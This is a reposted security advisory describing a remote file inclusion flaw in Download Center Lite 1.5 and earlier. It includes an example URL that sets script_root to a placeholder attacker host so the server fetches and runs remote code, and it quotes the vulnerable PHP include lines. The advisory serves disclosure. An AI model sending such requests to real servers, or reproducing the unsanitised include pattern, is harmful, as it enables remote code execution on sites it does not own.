[转载]Download Center Lite Arbitrary File Inclusion

  信息来源：A^C^E

Summary
"Download Center Lite is easy to use download manager for Internet pages, it allows hiding real path to downloads and preventing direct access to download folders."

The default settings of Download Center Lite(DCL) allow attackers to cause the program to include arbitrary files.

Credit:
The information has been provided by Filip Groszynski.

Details
Vulnerable Systems:
* Download Center Lite version 1.5 and prior

Download Center Lite combined with the PHP variable: register_globals=on and allow_url_fopen=on, allows remote attackers to include any file they desire from a remote machine in addition to causing its execution.

Example:
http://[victim]/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker_box]/

Vulnerable code in inc/download_center_lite.inc.php:
/*********************************
Include some files
**********************************/
include($script_root . 'inc/functions.inc.php');
include($script_root . 'inc/template.class.inc.php');
include($script_root . 'inc/log_downloads.class.inc.php');
include($script_root . 'languages/language.' . $language . '.inc.php');